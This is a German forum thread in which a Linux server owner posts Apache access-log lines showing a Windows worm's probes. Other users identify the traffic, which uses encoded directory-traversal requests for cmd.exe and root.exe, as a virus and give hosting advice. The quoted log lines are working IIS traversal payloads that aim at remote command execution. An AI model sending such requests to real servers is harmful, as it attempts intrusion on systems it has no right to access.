mir fiel heut beim durschstöbern der access_log folgende Eintrag auf (der sich auch recht oft wiederholt)

217.17.117.216 - - [02/Nov/2003:16:53:44 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.17.117.216 - - [02/Nov/2003:16:53:45 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.17.117.216 - - [02/Nov/2003:16:53:45 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.17.117.216 - - [02/Nov/2003:16:53:46 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.17.117.216 - - [02/Nov/2003:16:53:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.17.117.216 - - [02/Nov/2003:16:53:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.17.117.216 - - [02/Nov/2003:16:53:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.17.117.216 - - [02/Nov/2003:16:53:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.17.117.216 - - [02/Nov/2003:16:53:48 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.17.117.216 - - [02/Nov/2003:16:53:48 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.17.117.216 - - [02/Nov/2003:16:53:49 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.17.117.216 - - [02/Nov/2003:16:53:49 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.17.117.216 - - [02/Nov/2003:16:53:50 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.17.117.216 - - [02/Nov/2003:16:53:50 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.17.117.216 - - [02/Nov/2003:16:53:51 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.17.117.216 - - [02/Nov/2003:16:53:52 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

Was könnte das sein? Ist zweitweise echt so schlimm, dass mein DSL garnichmehr zu gebrauchen ist und ich den httpd runterfahren muss....

Such mal danach hier im Forum, das hatten wir schon recht oft!

Diese Meldung bekomme ich bei mir regelmässig auf meinem Webserver.
Ich habe als Analysetool awstats laufen und dort sehe ich diese Aufrufe immer wieder.

Das ist einer der netten Windoof-Viren, der versucht auf deinem Rechner eine Command-Session zu starten.

Da du aber Linux und nicht Windoof hast ist das egal :-)

naja, fast. Das Ding lastet mein DSL total aus und die vielen Anfragen machen meinem Server zu schaffen...

Hast du eine Webseite freigegeben und wird die oft besucht???
Vielleicht hat ja einer deiner Besucher den Virus auf seinem Rechner?!?!?

Ich habe meinen Server über DynDns angebunden und hoste drei Webseiten.
Außer dem Webserver läuft auch noch mein Mailserver und der INN darauf.
Aber der Rechner, ein P3 700MHz, schafft das alles.

Da der Server sonst nichts zu tun hat, habe ich ihm noch einen Seti@Home Client verpasst.

Wenn du eine "offizielle" Webseite hast, frag doch mal bei deinen Usern nach.

was heist offiziell? Ist ebenfalls nen dyndns-account. Auf dem Server läuft noch mein Mailserver und der Fileserver. Ist halt nur ein K6-2 400 @ 64MB RAM.

Mit offiziell meinte ich eine Webseite die in einigen Suchmaschinen eingetragen ist und häufig oder viel besucht wird.

Meine Webseiten sind nicht in Suchmaschinen eingetragen.

Die 64MB sind wahrscheinlich etwas wenig für einen Rechner mit den Aufgaben, wie sieht die Auslastung aus?
Ist viel ins Swap-File ausgelagert?

ne, so oft is die Page nich besucht. In Suchmaschienen is sie auch nich drin. Die Page is eigentlich nur für den internen Gebrauch und um hin und wieder ein paar Files zu verteilen, also nix großartiges.

Im Swap sind so 10 - 15MB. Sobald ich wieder Kohle hab' bekommt die gute auch noch mehr RAM, immo bin ich aber blank :)

Wenn deine Site nur für Intern ist schalt sie nach extern ab, oder gib ihr nen anderen Port !

ne, mit intern meinte ich, nur für die, die auf meinem Sys nen Account ham. z.B. brauch ich halt auch Squirellmail von extern.